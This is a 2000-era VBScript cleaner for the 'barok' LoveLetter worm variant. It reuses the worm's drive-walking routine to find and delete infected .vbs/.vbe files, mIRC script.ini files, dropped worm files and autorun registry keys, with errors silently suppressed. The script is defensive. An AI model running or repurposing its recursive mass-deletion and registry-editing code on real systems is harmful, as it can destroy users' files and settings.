rem (C) 2000 Content Management AG


rem written by Babak Kunze and Raoul Matthiessen





rem read this legal notice:





rem Use this script at your own risk. We dont provide 


rem any guarantee for any damage caused by this cleaner.





rem Das Herunterladen und die Installation der hier


rem bereitgestellten Software erfolgen auf eigene 


rem Gefahr. CM4all uebernimmt keine Gewaehrleistung 


rem oder Haftung fuer etwaige Schaeden, die durch die 


rem Installation und Ausfuehrung entstehen koennen. 


rem Die Nutzer verzichten auf jedwede Ansprueche gegen 


rem CM4all, die sich aus diesem Vorgang ergeben koennen. 


rem Mit dem Herunterladen der Software erkennen die 


rem Nutzer diese Nutzungsbedingungen an.





rem Fuehren Sie das Programm aus, indem Sie es auf


rem Festplatte speichern und danach durch einen 


rem Doppelklick starten.





rem kill barok -loveletter(vbe)


rem Before using this script delete all mails


rem containing the original worm from your inbox


rem in your mailreader. If the worm gets to execute


rem after applying this patch it overrides also this


rem script with its own code. Make this script readonly


rem after download to protect it from beeing overriden!


rem this script is a modified version of the


rem original worm, which uses the same way 


rem of searching for the files it tries to infect.


rem This modified program runs through all reachable


rem directories and looks for files ending with ".vbs".


rem It reads the first line to see, if it is really


rem infected. If true, the file will be removed from 


rem the disk. A log file will be created in the root 


rem directory of the first harddisk "C:\uninfect.log".


rem You can check which files have been removed


rem in order to restore the files from a available 


rem backup medium. No data can be recovered by the


rem script, but it helps preventing further damages.





On Error Resume Next


dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow


eq=""


ctr=0


Set fso = CreateObject("Scripting.FileSystemObject")


set file = fso.OpenTextFile(WScript.ScriptFullname,1)


rem vbscopy=file.ReadAll





main()





sub main()


	On Error Resume Next


	dim wscr,rr


	set wscr=CreateObject("WScript.Shell")


	Set dirwin = fso.GetSpecialFolder(0)


	Set dirsystem = fso.GetSpecialFolder(1)


	Set dirtemp = fso.GetSpecialFolder(2)


	fso.DeleteFile dirsystem&"\MSKernel32.vbs", true


	fso.DeleteFile dirwin&"\Win32DLL.vbs", true


	fso.DeleteFile dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs", true


	fso.DeleteFile dirsystem&"\LOVE-LETTER-FOR-YOU.HTM", true


	regruns()


	listadriv()


	wscr.RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")


end sub





sub regruns()


	On Error Resume Next


	Dim num,downread


	regdelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32"


	regdelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL"


	


	downread=""


	downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")


	if (downread="") then


		downread="c:\"


	end if


	


	if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then


		fso.DeleteFile downread&"\WIN-BUGSFIX.exe", true


	end if





	regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "about:blank"


	regdelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX"


end sub





sub listadriv


	On Error Resume Next


	Dim d,dc,s


	Set dc = fso.Drives


	For Each d in dc


		If d.DriveType = 2 or d.DriveType=3 Then


			folderlist(d.path&"\")


		end if


	Next


	listadriv = s


end sub





sub deinfectfiles(folderspec)  


	On Error Resume Next


	dim f,f1,fc,ext,ap,mircfname,s,bname,mp3,cmfile,cmline,cmtodel


	


	set ap = fso.OpenTextFile("c:\uninfect.log", 8, true, -2)


	ap.write "trying desinfect in: "&folderspec&vbcrlf


	


	set f = fso.GetFolder(folderspec)


	set fc = f.Files


	


	for each f1 in fc


		ext=fso.GetExtensionName(f1.path)


		ext=lcase(ext)


		s=lcase(f1.name)


		if (ext="vbs") or (ext="vbe") then


			


			set cmfile = fso.openTextFile(f1.path, 1, false, -2)


			cmline = cmfile.Read(27)


			cmfile.close()


			


			if (cmline = "rem  barok -loveletter(vbe)") then


				ap.write "found infected script: "&f1.path&vbcrlf


				set cmtodel = fso.GetFile(f1.path)


				cmtodel.Delete(true)


			else


				ap.write "found clean script: "&f1.path&vbcrlf


			end if


		end if			


		if (eq<>folderspec) then


			if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then


				set cmtodel = fso.GetFile(folderspec&"\script.ini")


				cmtodel.Delete(true)


			end if


		end if


	next  


	


	ap.close


end sub





sub folderlist(folderspec)  


	On Error Resume Next


	dim f,f1,sf


	set f = fso.GetFolder(folderspec)  


	set sf = f.SubFolders


	for each f1 in sf


		deinfectfiles(f1.path)


		folderlist(f1.path)


	next  


end sub





sub regcreate(regkey,regvalue)


	Set regedit = CreateObject("WScript.Shell")


	regedit.RegWrite regkey,regvalue


end sub





sub regdelete(regkey)


	Set regedit = CreateObject("WScript.Shell")


	regedit.RegDelete regkey


end sub





function regget(value)


	Set regedit = CreateObject("WScript.Shell")


	regget=regedit.RegRead(value)


end function





function fileexist(filespec)


	On Error Resume Next


	dim msg


	if (fso.FileExists(filespec)) Then


		msg = 0


	else


		msg = 1


	end if


	fileexist = msg


end function





function folderexist(folderspec)


	On Error Resume Next


	dim msg


	if (fso.GetFolderExists(folderspec)) then


		msg = 0


	else


		msg = 1


	end if


	fileexist = msg


end function